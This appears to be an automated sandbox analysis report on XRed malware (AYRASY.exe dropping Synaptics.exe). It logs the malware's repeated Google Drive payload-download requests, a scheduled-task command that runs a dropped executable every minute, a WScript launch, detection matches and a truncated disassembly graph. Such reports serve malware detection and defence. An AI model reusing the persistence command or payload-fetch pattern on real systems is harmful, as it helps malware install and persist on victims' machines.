                                                                                                                            2024-12-30 10:24:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC5H8Rf2gxopgfU0LNy-PTnvK8i1CW1NpBbzXJGXOXOtCKkUv8iXakdI_QrBpvRvClQZ
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:29 GMT
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fntrifWRNxc3w0N0Tpos8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                            2024-12-30 10:24:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 49 49 36 2d 73 45 4b 32 4c 46 6e 33 62 2d 33 7a 32 33 65 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="gII6-sEK2LFn3b-3z23ebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                            2024-12-30 10:24:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.649868172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC7kehbyELL0W91XsWCbMg9moQ5Wzh-IbfwZp6bVz_HIu12WHEwQX_rE4NWCjY54xl4K
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:35 GMT
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kbX6avv9aSR2lRkvvhaC_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                            2024-12-30 10:24:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 76 4b 4d 77 4a 54 73 69 69 6f 6c 2d 5f 6c 47 65 54 36 61 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="svKMwJTsiiol-_lGeT6aOw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                            2024-12-30 10:24:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.649867142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:35 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-7nR4tlZ2BFl1LKQRL8Yh_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:05:24:05
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\AYRASY.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1'750'016 bytes
                                                                                                                            MD5 hash:07E25C260C13B82CD867DAEF02255C82
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:05:24:05
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\._cache_AYRASY.exe"
                                                                                                                            Imagebase:0x170000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:05:24:05
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:771'584 bytes
                                                                                                                            MD5 hash:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:05:24:07
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                            Imagebase:0xaf0000
                                                                                                                            File size:53'161'064 bytes
                                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:05:24:08
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                                                                                                            Imagebase:0x1c0000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:05:24:08
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:05:24:08
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
                                                                                                                            Imagebase:0x3d0000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:05:24:08
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                                                                                                            Imagebase:0xb10000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:05:24:11
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:05:24:18
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:05:24:26
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:771'584 bytes
                                                                                                                            MD5 hash:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:05:24:28
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:483'680 bytes
                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:05:24:34
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:20
                                                                                                                            Start time:05:24:42
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:21
                                                                                                                            Start time:05:25:01
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:22
                                                                                                                            Start time:05:26:00
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:4.5%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:9.5%
                                                                                                                              Total number of Nodes:2000
                                                                                                                              Total number of Limit Nodes:44
                                                                                                                              execution_graph 101547 181118 102128 18e016 101547->102128 101549 18112e 101550 181148 101549->101550 101551 1eabeb 101549->101551 102137 183680 101550->102137 102226 18cf79 49 API calls 101551->102226 101555 1eb628 Mailbox 101556 1eac2a 101558 1eac4a Mailbox 101556->101558 102227 1bba5d 48 API calls 101556->102227 102234 1bd520 86 API calls 4 library calls 101558->102234 101559 180119 102237 1bd520 86 API calls 4 library calls 101559->102237 101562 18105e 102228 17c935 101562->102228 101563 17c935 48 API calls 101593 17fad8 Mailbox _memmove 101563->101593 101565 180dee 102208 17d89e 101565->102208 101566 1eb772 102238 1bd520 86 API calls 4 library calls 101566->102238 101567 180dfa 101573 17d89e 50 API calls 101567->101573 101570 181063 102236 1bd520 86 API calls 4 library calls 101570->102236 101575 180e83 101573->101575 101574 17d3d2 48 API calls 101574->101593 102218 17caee 101575->102218 101577 1eb7d2 101578 191b2a 52 API calls __cinit 101578->101593 101580 17fbf1 Mailbox 101583 181230 101583->101580 102235 1bd520 86 API calls 4 library calls 101583->102235 101585 19010a 48 API calls 101585->101593 101588 1810f1 Mailbox 102233 1bd520 86 API calls 4 library calls 101588->102233 101590 1eb583 102232 1bd520 86 API calls 4 library calls 101590->102232 101592 1aa599 InterlockedDecrement 101592->101593 101593->101559 101593->101562 101593->101563 101593->101565 101593->101566 101593->101567 101593->101570 101593->101574 101593->101575 101593->101578 101593->101580 101593->101583 101593->101585 101593->101588 101593->101590 101593->101592 101614 17f6d0 101593->101614 101686 17fa40 101593->101686 101744 1c013f 101593->101744 101757 1d0bfa 101593->101757 101760 1bbe47 101593->101760 101764 1c9122 101593->101764 101778 1c92c0 101593->101778 101796 18f03e 101593->101796 101799 1d798d 101593->101799 101804 1d30ad 101593->101804 101858 1c936f 101593->101858 101886 1781c6 101593->101886 101956 18dd84 101593->101956 101959 1750a3 101593->101959 101964 1c8065 GetCursorPos GetForegroundWindow 101593->101964 101978 1d804e 101593->101978 101992 1cb74b VariantInit 101593->101992 102033 18ef0d 101593->102033 102076 1d10e5 101593->102076 102082 1d1f19 101593->102082 102085 1d17aa 101593->102085 102090 18f461 101593->102090 102207 181620 59 API calls Mailbox 101593->102207 102222 1cee52 82 API calls 2 library calls 101593->102222 102223 1cef9d 90 API calls Mailbox 101593->102223 102224 1bb020 48 API calls 101593->102224 102225 1ce713 417 API calls Mailbox 101593->102225 101615 17f708 101614->101615 101620 17f77b 101614->101620 101616 17f712 101615->101616 101617 1ec4d5 101615->101617 101618 17f71c 101616->101618 101637 